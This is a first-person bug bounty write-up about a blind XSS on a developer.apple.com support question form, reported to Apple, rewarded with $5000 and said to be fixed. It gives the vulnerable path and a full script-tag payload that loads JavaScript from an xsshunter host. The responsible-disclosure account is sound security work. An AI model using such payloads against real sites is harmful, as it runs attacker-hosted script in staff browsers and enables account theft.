apple.com blind xss $5000

Hay there hope you all good , this my third time i write the story how i found some blind xss and got bounty $5000.

its a simple story , i just use knockpy to find some subdomain and than i chose one of many subdomain to be my target bughunting.

lets begin, i chose my target subdomain “ https://developer.apple.com”, i register some account there and login.

i look around at “ https://developer.apple.com” try to find some vulnerability there and i got nothing , im not giveup and continue to find some vulnerability, after many time to try i found some directory “https://developer.apple.com/contact/topic/select/SC1109/subtopic/select”,here i found some function where the user can send some question to support team,i click and insert my xsshunter payload “><script src=https://dimasaprilian993.xss.ht></script> and send to the support team.

suprise i got email notification from xsshunter if my payload execute there,

my lucky,after that I immediately sent some email to “product-security@apple.com” if i found some blind xss there with screenshot,dom and how to reproduce ,after a few days i got reply like this .

and then after a few weeks i got email again, they said if my finding is qualifies for the apple security bounty.

im really happy its my big award i ever got.

thanks again to the bugbounty comunity and all people help me .

TIMELINE

4 november 2020 : i sent email to aplle security

6 november 2020 : apple secuirty send me email

9 november 2020 : ask some update

10 november 2020 : still investigating my finding

12 november 2020 : give me award $5000

1 Mei 2021 : bug fixed and disclouse